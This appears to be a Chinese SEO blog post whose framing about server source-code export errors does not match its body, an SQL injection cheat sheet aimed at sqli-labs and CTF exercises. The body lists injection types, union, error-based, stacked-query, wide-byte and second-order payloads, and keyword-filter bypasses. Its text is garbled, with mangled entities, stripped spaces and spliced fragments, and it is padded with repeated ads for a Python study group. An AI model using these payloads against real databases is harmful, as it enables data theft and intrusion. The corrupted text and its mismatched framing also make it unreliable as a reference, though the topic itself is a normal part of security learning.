其实服务器导出网站源码分享错误的问题并不复杂,但是又很多的朋友都不太了解服务器源码提取,因此呢,今天小编就来为大家分享服务器导出网站源码分享错误的一些知识,希望可以帮助到大家,下面我们一起来看看这个问题的分析吧!
1.SQL分类
基于变量数据类型分
数字型注入字符型注入&39;&39;)
搜索型注入%’
JSON型注入(判断是数字还是字符考虑要不要闭合
JSON={&34;:&39;and1=2unionselect1,database(),234;}
如果大家在学习中遇到困难,想找一个python学习交流环境,可以加入我们的python裙,关注小编,并私信“01”即可进裙,领取python学习资料,会节约很多时间,减少很多遇到的难题。
基于获取数据的方法
基于回响基于错误盲注布尔型盲注时间盲注
基于注入点位置分类(请求方法)
注入要判断是否有干扰
GET注入Cookie注入POST注入(登录框)REQUEST注入(全部接受)
HTTP头部(SERVER注入)
防护软件可能只针对某种提交方式进行防护可以使用其他方式进行绕过
基于查询方式
2.SQL注入测试方法
1.寻找注入点(登录框,表单,http头部(cookie,ua,re),搜索或者查找。。)
2.判断注入点对符号有没有干扰
3.构造测试语句->1,判断注入类型(数字,字符)->2,闭合(–+
4.MYSQL基础知识
重要名称
information_schema在php5.0以后支持的information_schema.schemata存放的是所有数据库名information_schema.tables存放的是所有表名information_schema.columns存放的是所有列名table_schema数据库名字table_name表名column_name列名column_name用来获取数据库的
SQL命令
1.查看当前数据库showdatabases
2.创建数据库createdatabasewljycharset=gbk;
3.使用数据库usewljy;
4.查看当前数据表showtables;
5.创建数据表default:默认值comment:备注表类型:intvarchar(50)auto_increment自动增长primarykeycreatetabletest(idintprimarykeyauto_increment,namevarchar(50)notnull,addrvarchar(25)notnulldefault&39;)engine=innodbcharset=utf8;
6.查看表结构desc(descripe)testshowcreatetable\\G–将结果竖着排列
7.插入数据insertintotest(id,name,addr)values(1,&39;,&39;);insertintotestvalues(null,&39;,&39;);insertintotest(addr)values(&39;东京&39;tom&39;王五&34;select*from510_admin&39;)and(select1from(selectcount()frominformation_schema.tablesgroupbyconcat((selecttable_namefrominformation_schema.tableswheretable_schema=database()limit0,1),floor(rand(0)2)))a)–+
2.extractvalue报错
http://127.0.0.1/sqllab/Less-3/?id=-1&39;;showdatabases;39;;showcolumnsfromwords;39;;showcolumnsfrom1919810931114514;39;;renametableswordstowords1;renametables1919810931114514towords;altertablewordschangeflagidvarchar(100);39;or1=139;;usesupersqli;set@sql=concat(&39;,&39;);PREPAREpreFROM@sql;EXECUTEpre;–+
用concat绕过了关键字的检查
sqli38关
11.宽字节注入
id=%df%27%20union%20select%201,schema_name,3%20from%20information_schema.schemata%20limit%206,5%20%23
12.二次注入
UPDATEusersSETPASSWORD=&39;whereusername=&39;;
以SQLli24关为例
注册用户admin&
进行登录
修改密码
利用单引号闭合39;andupdatexml(1,concat(0x7e,(selectdatabase()),0x7e),1)and&39;=&39;andextractvalue(1,concat(0x7e,(select@@basedir),0x7e))39;andupdatexml(1,concat(0x7e,(selectdatabase()),0x7e),1)and&39;=&39;unionselect1,2,3,group_concat(schema_name)frominformation_schema.schemata39;通过十六进制
关键字为空,通过双写绕过
内联注释绕过/!select/=被过滤likeregexp
空格被过滤select()%0a,%d回车或者tab
andor被过滤||&&
最后多说一句,小编是一名python开发工程师,这里有我自己整理了一套最新的python系统学习教程,包括从基础的python脚本到web开发、爬虫、数据分析、数据可视化、机器学习等。想要这些资料的可以关注小编,并在后台私信小编:“01”即可领取。
服务器导出网站源码分享错误的介绍就聊到这里吧,感谢你花时间阅读本站内容,更多关于服务器源码提取、服务器导出网站源码分享错误的信息别忘了在本站进行查找哦。